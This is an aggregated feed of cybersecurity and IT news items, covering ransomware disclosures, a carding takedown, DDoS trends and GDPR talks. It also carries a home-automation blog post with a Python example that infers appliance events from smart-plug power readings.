26% of remote workers have experienced a cyber attack personally, while 45% of employers have asked their employees to use their personal devices for work since the start of the pandemic, according to Microsoft research. The study surveyed 500 employees and 200 business decision makers in September 2020 about remote working, digital security behaviours, and the worries they now face.

Retrofitting cybersecurity

The accelerated transition to homeworking is placing pressure on organizations to support … More

The post Top digital security worries when it comes to remote employees appeared first on Help Net Security.

Cyber insurance claims on the rise

External attacks on companies result in the most expensive cyber insurance losses, but it is employee mistakes and technical problems that are the most frequent generator of claims by number, according to a report from Allianz Global Corporate & Specialty (AGCS). The study analyzes 1,736 cyber-related insurance claims worth EUR 660mn (US$ 770mn) involving AGCS and other insurers from 2015 to 2020. “Losses from incidents such as distributed denial of service (DDoS) attacks or phishing … More

The post Cyber insurance claims on the rise appeared first on Help Net Security.

The AI in cybersecurity market to generate $101.8 billion in 2030

The AI in cybersecurity market is projected to generate a revenue of $101.8 billion in 2030, increasing from $8.6 billion in 2019, progressing at a 25.7% CAGR during 2020-2030, ResearchAndMarkets reveals. The market is categorized into threat intelligence, fraud detection/anti-fraud, security and vulnerability management, data loss prevention (DLP), identity and access management, intrusion detection/prevention system, antivirus/antimalware, unified threat management, and risk & compliance management, on the basis of application. The DLP category is expected to … More

The post The AI in cybersecurity market to generate $101.8 billion in 2030 appeared first on Help Net Security.

It’s time to begin optimizing your virtual desktop experience

For companies that were already on the digital track prior to the pandemic, the shift to work-from-home (WFH) accelerated something that was already in progress. Unfortunately, for businesses with no transformation plan, or only a basic one, “going virtual” has been a bit of a scramble. Coming into 2021, this scramble is largely over, and…

The post It’s time to begin optimizing your virtual desktop experience first appeared on IT World Canada.

IoT Unravelled Part 5: Practical Use Case Videos

This is the fifth and final part of the IoT unravelled blog series. Part 1 was all about what a mess the IoT landscape is, but then there's Home Assistant to unify it all. In part 2 I delved into networking bits and pieces, namely IP addresses, my Ubiquiti UniFi gear and Zigbee. Part 3 was all about security and how that's all a bit of a mess too, particularly as it relates to firmware patching and device isolation on networks. Then in part 4 I focussed on the user experience because whilst it's great having all that digitised stuff in the home, it can't degrade the experience of the less technical users of the house.

Now in part 5, let's look at how it all works together, and I've done 11 short videos showing different parts of my house and how the IoT bits work there. If you want to just watch them all back to back, I've put everything in a YouTube playlist embedded here:

Alternatively, you can watch each individual video below complete with some additional commentary about how things work or how I'd do them differently. All these videos are unedited, candid versions of precisely how my house works. Enjoy 🙂

Opening the Garage Door Remotely

The original goal of this whole IoT journey! This is enormously useful and not a day goes by where I don't use Apple HomeKit to open the garage door in one way or another. Yesterday morning whilst out Christmas shopping, UniFi Protect popped up on my watch as there was someone at the door. A quick look showed it was the gardeners who normally give advance notice, but this time showed up unannounced and didn't have access to the property. Over to HomeKit, pop open the garage door, job done!

Playing a Sonos Station with My Watch

This seems like a minor benefit but switching to the station I want via the Sonos app is a bit painful. Open it up, scroll through the favourites, choose the station, sync it to both my Sonos units, set the volume, done. But it's 2 taps on the Apple Watch; one to open the Home Assistant app and a second to "Play ABC Radio". It's the little things like this that I really appreciate.

The Washing Machine Just Finished

Raising alerts when events occur is one of the joys of home automation and whilst I didn't see the value in it at purchase time, having connectivity on the washing machine is actually kinda neat. There's a Samsung SmartThings integration in HA which makes it dead simple to track the washing machine state and let us know once a wash cycle is complete and the clothes are ready to hang on the line.

Is the Coffee Machine Out of Water?

This automation is far more useful than it probably seems, namely because once the machine is out of water and cools down, there's quite a lead time to warm back up again. It bugged me, and the solution was simple using the HS110 energy monitoring plugs. I'm using them to track a bunch of other things around the house too; it just takes a little tweaking to associate the change in power usage with an event in the appliance you're tracking.
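The washing-machine and coffee-machine automations above both rest on the same trick: turning a smart plug's wattage feed into discrete appliance events. As an added example (not code from the original post or from Home Assistant), the Python below implements that inference as a two-threshold state machine with a dwell time, so a brief dip in draw (a pump pause, a rinse) is not mistaken for "finished", and adds a check for a machine that has gone cold because it stopped its normal reheat cycle. The readings, thresholds and the `reheat_gap` are constructed assumptions, not values from the post.

```python
"""Turn smart-plug power readings into appliance events.

Added example, not code from the original post: a hysteresis detector that
converts a stream of wattage readings (as an energy-monitoring plug such as the
HS110 reports them) into 'started' / 'finished' events.  All readings below are
constructed sample data; the thresholds are assumptions for illustration.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

Event = Tuple[int, str]  # (sample index, "started" | "finished")


@dataclass
class ApplianceDetector:
    """Two-threshold state machine with a dwell time on each transition."""
    on_watts: float           # above this the appliance is drawing real power
    off_watts: float          # below this it is idle; the gap between is ignored
    min_active_samples: int   # consecutive 'on' samples before reporting 'started'
    min_idle_samples: int     # consecutive 'off' samples before reporting 'finished'
    state: str = "idle"
    streak: int = 0           # length of the current run of contrary samples
    events: List[Event] = field(default_factory=list)

    def feed(self, index: int, watts: float) -> Optional[str]:
        """Consume one reading; return the event it triggers, if any."""
        if self.state == "idle":
            contrary = watts > self.on_watts
            needed, next_state, name = self.min_active_samples, "active", "started"
        else:
            contrary = watts < self.off_watts
            needed, next_state, name = self.min_idle_samples, "idle", "finished"

        # A reading that does not contradict the current state resets the streak,
        # so a short dip in draw does not count as 'finished' on its own.
        self.streak = self.streak + 1 if contrary else 0
        if self.streak < needed:
            return None
        self.state, self.streak = next_state, 0
        self.events.append((index, name))
        return name


def detect_events(readings: List[float], on_watts: float = 50.0,
                  off_watts: float = 20.0, min_active_samples: int = 2,
                  min_idle_samples: int = 4) -> List[Event]:
    """Run the detector over a whole series and return the events it emitted."""
    det = ApplianceDetector(on_watts, off_watts, min_active_samples, min_idle_samples)
    for i, w in enumerate(readings):
        det.feed(i, w)
    return det.events


def cooled_down(events: List[Event], now: int, reheat_gap: int) -> bool:
    """True when the last event was 'finished' longer ago than the normal reheat cycle.

    A machine that reheats periodically while it has water goes silent once it
    runs dry; `reheat_gap` (an assumption) is the longest normal pause between
    heating bursts, measured in samples.
    """
    if not events or events[-1][1] != "finished":
        return False
    return now - events[-1][0] > reheat_gap


# Constructed sample: washing machine, one reading per 30 s (watts).
WASHER_SAMPLE = [1, 1, 1, 420, 480, 2100, 2050, 310, 9, 460, 1900, 1850, 6, 4, 3, 2, 1, 1]
# Constructed sample: coffee machine heater cycling, then silent after running dry.
COFFEE_SAMPLE = [2, 1200, 1300, 1250, 2, 2, 1, 2, 1, 1200, 1250, 3, 2, 2, 2, 2, 2]

if __name__ == "__main__":
    print(detect_events(WASHER_SAMPLE))  # [(4, 'started'), (15, 'finished')]
    coffee = detect_events(COFFEE_SAMPLE)
    print(coffee, cooled_down(coffee, now=len(COFFEE_SAMPLE) + 8, reheat_gap=5))
```

The dwell counters are what make this robust: the washing-machine series contains a 9 W reading between two heating phases, and with `min_idle_samples=4` it never produces a false "finished". Tuning means recording a few real cycles from the plug and picking `on_watts`/`off_watts` with a clear gap between them.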

Ring Ring, Ring Ring, There's Someone at the Door

I couldn't wait to get this doorbell in place as it's another piece of the automation puzzle that gets a daily workout. The Ubiquiti UniFi Protect G4 doorbell has an awesome 1080p picture quality and not only does all the stuff in the video, but is also used as a motion sensor to trigger lights should someone walk up to the door after sunset. Plus, it's permanently recording everything and flagging the timeline with events based on motion within predefined zones.

Managing My Office Lights Based on Movement and Stream Deck Buttons

My office lighting was one of the first things I did with home automation as it's continuously changing. I'm writing this with lots of natural light flooding into the room, but later I'll be livestreaming with the curtains closed and 5 artificial lights on, all easily triggered on or off. What I didn't mention in this video is that the lights are only turned on automatically when the light is beneath a certain level; there's no need to automatically turn them on when it's already well lit.

Stair Lights and Kids' Bedroom Lights with Aqara Motion Sensors

The stair lighting is one of the most useful automations in the house and it's another IoT feature we use daily. The kids love their rooms and take great pleasure in showing visitors not just the lights themselves, but how they can ask Alexa to change them to their hearts' desire. I wouldn't do this in our master bedroom, but it's great fun for the kids 😊

Triggering Lights with Ubiquiti UniFi Protect Cameras

The UniFi Protect integration has been fantastic for triggering lights on, especially outdoors where different lights are triggered by movement in different areas. I love this as a security precaution, but do often find a little bit of lag for use in an indoor room where you want the light coming on pretty much immediately when motion appears (although strangely, it performed very well in the video below!)

It's Almost Sunset, Set the Lights

There's just something about coming back to a dark house that feels kinda... lonely. I've put Shellys behind a bunch of the lights both indoors and outdoors to make sure the place always feels welcoming after sunset. Combined with the Aqara button in the video, it's super easy for any family member to either turn them on earlier or turn them off all at once when heading to bed.

The Sun Has Set and the Garage Door is Open

This might seem like a minor one and it's only occasionally triggered as I'm pretty good at keeping the garage door shut, but I really don't want to be going to bed leaving it wide open. A combination of this automation and another Ubiquiti cam pointing at the garage door makes it easy to ensure the place is left how I want it before all the lights go out.

Backlighting Around the TV

I like the backlighting as it makes the black TV pop out from the (very dark blue) wall. I'm not completely happy with the diodes on the Hue being individually visible and would really like a diffuser on them but that said, they're only visible when you're offset from the TV like I am in the video. You only see a nice warm glow when you're directly in front of the TV.

Summary

I hope you've enjoyed this series, it's the culmination of many months of work I've been gradually adding to as I've progressed on my own IoT journey. I think this is a fascinating area of technology that's in its absolute infancy and clearly there are many rough edges to be ironed out. But that's also what makes it exciting, and I'm really looking forward to being more involved in the future of IoT.

Scott Helme and I will be livestreaming a discussion about our IoT journeys later today my time (Friday 27 November), watch for the video below 👇

[embedded video will appear here as soon as we kick off]

Ransomware hits US Fertility the largest US fertility network

US Fertility, the largest network of fertility centers in the U.S., discloses a ransomware attack that took place in September 2020.

US Fertility, the largest network of fertility centers in the U.S., revealed that a ransomware attack hit its systems in September 2020.

The US Fertility (USF) network comprises 55 locations across 10 states; its clinics completed almost 25,000 IVF cycles in 2018, and 130,000 babies have been born through them.

“On September 14, 2020, USF experienced an IT security event [..] that involved the inaccessibility of certain computer systems on our network as a result of a malware infection,” reads the Notice of Data Security Incident provided by the company.

“Through our immediate investigation and response, we determined that data on a number of servers and workstations connected to our domain had been encrypted by ransomware.”

The company immediately launched an investigation into the incident with the help of third-party forensic experts and notified law enforcement agencies.

Once it had identified the impacted systems, US Fertility took them down and completed the recovery operations on September 20.

Unfortunately, the investigation revealed that threat actors were able to steal a limited number of files containing various types of information for each impacted individual including names, addresses, dates of birth, MPI numbers, and for some individuals Social Security numbers.

The company confirmed that it has been working with a specialized team of third-party data auditors to accurately identify the impacted individuals.

“The forensic investigation is now concluded and confirmed that the unauthorized actor acquired a limited number of files during the period of unauthorized access, which occurred between August 12, 2020, and September 14, 2020, when the ransomware was executed,” continues the breach notification.

USF has established a dedicated call center (855-914-4699) to provide information and support to its customers.

“We take this incident very seriously and are committed to protecting the security and confidentiality of health information we gather in providing services to individuals,” said Mark Segal, Chief Executive Officer of USF.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Ransomware hits US Fertility the largest US fertility network appeared first on Security Affairs.

#DTX Cybersecurity Mini Summit: How CISOs Can Transform an Organization’s Cyber-Capabilities

The ways in which CISOs should go about transforming the cybersecurity capabilities of an entire organization was discussed during the DTX Cyber Security Mini Summit by Michael Jenkins MBE, CISO at Brunel University.

Jenkins previously spent a long career in the military including positions in counter-intelligence, and also played a major role in planning security for the 2012 London Olympics. In 2017, he was tasked with turning Brunel University’s cybersecurity capabilities into one of the best in the entire sector, through a five-year strategy. “Ultimately, the goal is taking a business from a low level of maturity in cyber-resilience right the way through to the best in the sector,” he noted.

Around three years into the plan, Jenkins discussed the approach he has taken to try and fulfil this ambitious target. He said the first step was inspiring everyone in the organization, including researchers, staff and students, “to care about data, probably more than the criminal cares to steal it from us.”

This was achieved by engaging in regular conversations with people on campus, helping them to learn about how cyber-criminals operate and “to see that it’s a very credible goal that we needed to achieve together.” Jenkins added that it was also important for him to understand the work of academics and students at the institution to allow him to “help secure their data in a way that is acceptable to them but is also acceptable to us as a community.” This enabled them to understand why particular security measures were in place, and to accept them.

The next element was developing the right strategic team and partners, including a small, tight-knit group of vendors who are well versed in the individual needs of Brunel University and its cybersecurity strategy. This strategy included the development of compartmentalized “safe data havens” and the ability to monitor access control for threats in the network. Jenkins explained: “I had to mould that and balance it to the business that we were – we aren’t a bank, insurer or top end government department, we’re a university, so it’s all about proportionality and sensible risk-based intelligence driven activity.”

Such a capability has now been built, and is leading towards a zero-trust model at the end of the five years. He emphasized how important it has been to ensure everyone understands this end goal, and why it is needed in the face of the threats the university faces. He noted that leading universities such as Brunel are a major target of sophisticated threat actors such as organized crime gangs and nation states.

To help get this buy-in from IT staff and the executive board, Jenkins utilizes regular simulated attack exercises to demonstrate just how damaging a successful attack could be. “It all goes back to everybody understanding the why – why do we want to do things this way,” he said. “One of the great things we’ve developed over the last couple of years is providing situational awareness to all our IT practitioners and major leaders and staff in how an attacker enters a network, their lateral movements, how they get the elevated privileges, how they conduct their actions on the objective – the entire end-to-end kill chain.”

There have been many advantages to such simulated exercises, according to Jenkins, chiefly greater buy-in from the staff and board and the identification of weaknesses within the business. He added: “It gives confidence to the board that their money is being well spent.”

GDPR Has Had Successes, Requires Public Knowledge of Data Spread

The success of the GDPR has been praised, but it is in conflict with the amount of data we create and how we do not consider consent.

Speaking during the Westminster Events Conference on data protection, Dr Subhajit Basu, associate professor of information technology (cyber law) at the University of Leeds and chair of the British and Irish Law Education and Technology Association (BILETA), said while technology drives our lives, the amount of data we create “is growing exponentially.”

He claimed that the number of data protection and privacy laws that have been enacted around the world “is a testament to the importance of data protection globally, or a desire by many countries to qualify trade with the European Union to meet its adequacy requirements.” So after Brexit, the opportunity is there for the UK to become a leading role model for a society empowered by data decisions, but to fulfil this ambition “the UK will have to build a robust legal framework in terms of data protection and cybersecurity.”

The Telecommunications Security bill received its latest reading in the House of Commons this week, and Basu called this “a step in the right direction” as it will propose fines on telcos if they fail to tighten security, but post-Brexit, the UK will need to improve its governance structure for handling data.

“In order to meet this potential, we must find a way to balance the flow of user data, whilst at the same time ensuring privacy, security, safety and ethical standards,” he said.

Basu called this a “fundamental” step, as he advocated for a continuation of a strong, user centric data protection law. However, he said that “data governance is just plain complicated” as data protection is often seen as separate from the right to privacy, and the focus is on due process and there are moves to find the best solution.

He went on to say that he has “a lot of faith in the GDPR” as this is the right step towards user empowerment for transparency and control to users when it comes to data sharing. “Data subjects are given more choices on how their information is collected, processed and used,” he said. “But hounding users with more rights means you have a role in protecting their data, but most users continue to hand over their data impatiently, causing this paradox where our concerns are not reflected in our behavior.”

Basu also said he has concerns about “consent in data protection law” as he sees that consent gives an “illusion of control, rather than any meaningful control from a data subject’s point of view.” This is because the process of obtaining consent has become more complicated, and will become more complicated as we move towards using more IoT and AI.

This is also paired with data protection fatigue, as users are asked to read privacy documentation and policies before giving consent, and this makes the process tedious. “The sheer number of documents that you need to navigate through is beyond any human capacity,” he said.

He concluded by calling a “lacklustre attitude” to GDPR alarming, and described the ICO’s supervisory and adjunct role “without proper demarcation as difficult to accept.”

Danish news agency Ritzau hit by ransomware, but did not pay the ransom

Ritzau, the biggest Danish news agency, was hit by a ransomware attack that brought it offline but refused to pay the ransom.

Ritzau, the biggest Danish news agency, was hit by a ransomware attack that brought it offline. The attack damaged a quarter of Ritzau’s 100 servers. The agency confirmed that it has rejected the ransom demand but did not reveal its amount.

Ritzaus Bureau A/S, or Ritzau for short, is a Danish news agency founded by Erik Ritzau in 1866. It collaborates with three other Scandinavian news agencies to provide Nordic News, an English-language Scandinavian news service.

“Ritzau CEO Lars Vesterloekke couldn’t say how big the ransom demand was because those behind the “professional attack” had left “a file with a message” that the agency didn’t open following instructions from its advisers.” reported the Associated Press.

The news agency has transferred its emergency distribution to clients to six live blogs that provide a better overview.

“If it goes as expected, then we can gradually be back to normal on Thursday,” said Ritzau CEO Lars Vesterloekke.

The agency launched an investigation into the incident with the help of an external security firm and its insurance company.

At the time of writing, the family of ransomware that hit the agency has yet to be revealed; it is also not clear whether the threat actors stole any data before encrypting the servers.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Danish news agency Ritzau hit by ransomware, but did not pay the ransom appeared first on Security Affairs.

Making your customer experience seamless in an uncertain world

By Nick Alevetsovitis

The past six months have brought with them a great deal of change. Many businesses saw major disruptions as they managed the unprecedented impact of the COVID-19 shutdowns. For some, this meant putting non-priority projects on hold. For others, it meant rapidly shifting resources – literally overnight in many cases – to…

The post Making your customer experience seamless in an uncertain world first appeared on IT World Canada.

Defining Codes of Conduct to Enable Post Brexit GDPR Compliance

Harmonization of data protection regulation should still be the aim, despite Brexit, to enable companies to trade across Europe.

Speaking during the Westminster Events Conference on data protection, Chris Combemale, CEO of the Data and Marketing Association, said that since the implementation of GDPR in May 2018, the harmonization of data protection “has been put at risk by data protection authorities across Europe” as they applied the legislation “in radically different ways in each country.”

This can affect customer trust, economic growth and job creation in relation to processing and getting to know customers better.

Combemale said data protection authorities (DPAs) should “apply the role as it is written.”

Looking at the code of conduct for GDPR, which he said was intended for relevant sectors and to achieve harmonization across Europe, in the first instance of “co-regulation” by data protection legislation, Combemale explained: “The logic is that a GDPR code of conduct, operated consistently across 27 or 28 countries, via an industry monitoring body, can provide a consistent interpretation of key aspects of GDPR within an industry sector.”

This would be across industry verticals and different types of businesses, as determined by Article 40 of the GDPR. He said the data and marketing industry has been working hard to achieve clarification of GDPR across Europe, through a combination of an EU code of conduct and national codes of conduct.

This has seen a European code of conduct being produced, while the Austrian DPA has approved a code of conduct for the use of third party data, as approved by the Austrian data and marketing association. The Italian DPA has approved a specific code of conduct for business information services, which is in the process of being approved.

In the UK, he said the Data and Marketing Association is working with the ICO to create a data and marketing code of conduct “including recognition of the existing data and marketing commission as the industry monitoring body.

“All these codes of conduct must reflect GDPR text in the way it was written and applied through the lens of sector knowledge and expertise,” he said.

The next step is to understand the scope of business legitimate interests and what that is within the text of GDPR. “We will work hard, using our industry expertise, to ensure all approved data and marketing codes of conduct across Europe and for our industry reflect this,” he said, “in order to understand the harmonization and consistency that was intended by GDPR being a regulation rather than a directive.”

If, in a worst case scenario, the UK is denied data adequacy, he concluded that industry codes of conduct can offer a basis for data transfers.

Cloud IAM and Cloud PAM Challenges Explained

Cloud computing has become a viable solution for companies large and small across all industries. Its accessibility, scalability, reliability, and flexibility are just a few of its benefits, which have led to its widespread adoption. However, although cloud environments primarily bring along a huge amount of advantages, they can also pose cybersecurity risks. Securing sensitive […]

The post Cloud IAM and Cloud PAM Challenges Explained appeared first on Heimdal Security Blog.

Carding Action 2020: Group-IB supports Europol-backed operation saving €40 million

Carding Action 2020 targeted crooks selling/purchasing compromised card data on sites selling stolen credit card data and darkweb marketplaces

Group-IB, a global threat hunting and intelligence company, has supported Carding Action 2020 – a cross-border operation led by Europol’s European Cyber Crime Centre (EC3) with support from law enforcement agencies including the Dedicated Card and Payment Crime Unit of the London Metropolitan and the City of London Police. The three-month anti-cybercrime effort targeted traders of compromised card details and prevented approximately €40 million in losses.

The details and results of the operation have been presented to the public today by Tobias Wieloch of EC3 at CyberCrimeCon Virtual 2020 – a global threat hunting and intelligence conference, powered by Group-IB.

Carding Action 2020 sought to mitigate and prevent losses for financial institutions and cardholders. During the three-month operation, Group-IB, the only private-sector cybersecurity company involved, provided information on approximately 90,000 pieces of recently compromised payment data. This data was obtained and analysed by the company’s experts thanks to Group-IB’s Threat Intelligence and Attribution system from unique non-public sources, such as botnet and JS-sniffer infrastructure, as well as underground card shops and marketplaces.

Europol facilitated the coordination and information exchange between law enforcement from Italy, Hungary, the UK and leading card schemes (payment network companies). According to Europol, The Carding Action prevented approximately €40 million in potential losses for mainly European financial institutions, who actioned the data as it was received from the payment providers. The savings were estimated by card schemes looking at the unique cards that were detected and flagged by Group-IB and multiplied by the average spend on those cards. 

All of the 90,000 pieces analysed by Group-IB included full card data – cards compromised via phishing websites, from end devices infected with banking Trojans, as well as by means of hijacked eCommerce websites and the use of JS-sniffers. According to the Group-IB Hi-Tech Crime Trends report 20/21, presented yesterday at CyberCrimeCon, the carding market grew by 116 percent from $880 mln to $1.9 bln. The expansion of JS-sniffer attacks targeting e-commerce merchants drove the significant increase in prevented losses.

“Cybercrime can affect all aspects of our daily life, from paying in the supermarket, transferring money to our friends to using online communication tools or Internet of Things devices at home. Cybercriminals can attack us in different ways and this requires a robust response not only from law enforcement but also from the private sector,” said Edvardas Šileris, Head of Europol’s European Cybercrime Centre (EC3). “With more than €40 million in losses prevented, Carding Action 2020 is a great example of how sharing information between private industries and law enforcement authorities is a key in combating the rising trend of e-skimming and preventing criminals from profiting on the back of EU citizens,” he added.

“As cybercriminals know no borders, neither should cooperation in cyberspace,” commented Nicholas Palmer, head of Group-IB global business. “We believe that the ultimate disruption of cybercrime comes from the strong collaboration between industry, international sharing organizations, and law enforcement. The Europol-backed Carding Action was a perfect display of such actions. The speed at which we were able to deliver so many savings would not have been possible without these efforts”. 

Original post at https://www.group-ib.com/media/carding-action-2020/

About Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks and online fraud. The company also specializes in high-profile cyber investigations and IP protection services. 

Pierluigi Paganini

(SecurityAffairs – hacking, Carding)

The post Carding Action 2020: Group-IB supports Europol-backed operation saving €40 million appeared first on Security Affairs.

DDoS Attacks Against Online Retailers Increase Four-Fold During Pandemic

The number of DDoS attacks targeting e-commerce in Europe has increased four-fold over the last eight months.

According to research by Stormwall, between February and October 2020, the number of DDoS attacks targeted at online retail services quadrupled compared to the same period last year.

It claimed the growth in attack numbers is primarily attributed to increased competition between online retailers during the global COVID-19 health crisis, and to attackers extorting money from businesses. “Cyber-criminals use website downtime as leverage, promising to stop the attack and restore the service operation once the victim company pays the ransom,” the company said.

Zach Varnell, senior AppSec consultant at nVisium, said: “DDoS attacks often go hand-in-hand with ransom notes demanding money to stop the attack. If these ransom notes get paid even at a small fraction of their frequency, DDoS operators will be incentivized to continue such schemes. This sometimes includes making good on their promise to attack those who do not pay up.

“Financial services were originally hit hard by these DDoS ransom threats and for obvious reasons as rich targets for cybercrime. Since there are far more online retailers than financial institutions today, and multiplying in their online presence owing to COVID-19, it is highly likely that targeting this industry is now becoming a lucrative source of ransom threats through DDoS attacks.”

He also pointed out that there are more customers shopping online now and therefore plenty of sensitive customer data to breach and exfiltrate, threatening online retailers who have previously not been security savvy.

Asked if he believed attackers are going after online retailers for financial gain, Brandon Hoffman, CISO at Netenrich, said: “They are 100% following the money. There has been a huge surge of online spending due to COVID-19 and a huge surge in furniture and home remodelling purchases. Many speculate that due to COVID-19, people are not able to take vacations so instead they are spending that budget improving their homes where they are essentially stuck more than normal. Coupled with the closing of physical stores worldwide, this explains the attack focus.”

Stormwall also found that the number of attacks on online electronics stores had increased five-fold, the number of attacks on online furniture stores had increased eight-fold, while attacks aimed at online renovation stores grew seven-fold.

“E-commerce has always been an attractive field to cyber-criminals, and during the pandemic, hackers’ interest in the sector developed even more,” said Ramil Khantimirov, CEO and co-founder of StormWall.

“Criminals are actively advancing the methods of DDoS attacks, and retailers are finding it increasingly difficult to defend against them. This is a serious threat. The new trend is that the attackers are attempting to find vulnerabilities that require a small number of requests per second to make a website unavailable. An effective defense system that can shield against this type of campaign needs to have intelligent DDoS protection, like proactive analysis and self-learning.”

Furthermore, the number of DDoS attacks over the HTTP protocol has risen by 296% between February and September 2020, compared to the same period last year.

AppDynamics the ‘centre’ of Cisco’s push into cloud and SaaS, says its new country manager

Thanks to a front-row seat within Cisco, AppDynamics’ new country manager Rebecca Leach has witnessed the tech giant go from hardware behemoth to hardware behemoth with a promising software portfolio. 

The post AppDynamics the ‘centre’ of Cisco’s push into cloud and SaaS, says its new country manager first appeared on IT World Canada.

Pure Storage expands Pure as-a-Service offerings, unveils new service catalogue

Pure Storage dropped a major expansion of its Pure as-a-Service consumption-based offerings this week, including a new service catalogue providing public cloud levels of price transparency for partners.

The post Pure Storage expands Pure as-a-Service offerings, unveils new service catalogue first appeared on IT World Canada.

Changing Employee Security Behavior Takes More Than Simple Awareness

Designing a behavioral change program requires an audit of existing security practices and where the sticking points are.

Acronis and World Economic Forum Partner to Combat Global Cybercrime

Cyber-protection firm Acronis has announced that it is collaborating with the World Economic Forum (WEF) Center for Cybersecurity to address rising cybercrime around the globe.

The WEF Center for Cybersecurity is an independent and impartial global platform focused on fostering international dialogues and collaboration to tackle cybersecurity challenges, convening key stakeholders from public and private sectors.

Through the partnership, Acronis will engage in the Cyber-Risk and Corporate Governance project to help establish a baseline understanding of key cybersecurity issues, while providing guidance on strategies for security and cyber-resiliency.

“The Forum’s most recent Global Risk Report noted that the top five global threats were cybersecurity-related, with cyber-attacks and data theft among the most immediate dangers,” said Acronis founder and CEO Serguei “SB” Beloussov. “Having been at the forefront of the new IT discipline of cyber-protection, Acronis brings a unique, comprehensive perspective to the protection challenges facing today’s institutions. By collaborating with our peers, we can ensure business and government leaders have the tools and frameworks needed to meet their cybersecurity obligations of the modern world.”

René Bonvanie, chairman of the board of Acronis, added: “Cybersecurity is critically important in the digital world, yet every day we witness successful breaches. Acronis uniquely offers a cyber-protection platform that natively integrates the five layers of protection into a single offering: prevention, detection, response, recovery and forensics.”

Suspected BEC scammers arrested in Nigeria following year-long Interpol investigation

Three men have been arrested in Nigeria, suspected of being members of an organised cybercrime gang that has targeted over 500,000 government agencies and private sector companies around the world. The group, dubbed TMT by threat researchers at Group-IB, is said to have engaged in attacks against businesses since at least 2017, tricking company employees […]

The post Suspected BEC scammers arrested in Nigeria following year-long Interpol investigation appeared first on The State of Security.

Sophos notifies data leak after a misconfiguration

The cyber-security firm Sophos is notifying customers via email about a security breach that took place earlier this week.

ZDNet reported that the cyber-security firm Sophos is notifying customers via email about a security breach; the company became aware of the incident on November 24.

“On November 24, 2020, Sophos was advised of an access permission issue in a tool used to store information on customers who have contacted Sophos Support,” reads the email sent to customers and obtained by ZDNet.

“At Sophos, customer privacy and security are always our top priority. We are contacting all affected customers,” the company said. “Additionally, we are implementing additional measures to ensure access permission settings are continuously secure.”

According to the company, exposed information included customer first and last names, email addresses, and phone numbers (optional).

A Sophos spokesperson revealed that only a “small subset” of the company’s customers were affected. At the time of writing the exact number of affected customers is still unknown.

Sophos became aware of the misconfiguration after it was alerted by a security researcher. The company immediately addressed the issue the same day.

In April, the security firm released an emergency patch to address an SQL injection zero-day vulnerability affecting its XG Firewall product that had been exploited in the wild.

The company investigated the incident and determined that hackers were targeting systems configured with either the administration (HTTPS service) or the User Portal exposed on the WAN zone.

The attackers exploited an SQL injection zero-day vulnerability to gain access to exposed XG devices.

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Sophos notifies data leak after a misconfiguration appeared first on Security Affairs.

Automated Monitoring in the Cloud

Glen Hymers of Save The Children International on Implementing a Cloud-First Approach
Glen Hymers, CISO and head of data protection at the U.K.-based charity Save the Children International, says adapting to a cloud-first environment requires extensive security measures, including automated monitoring.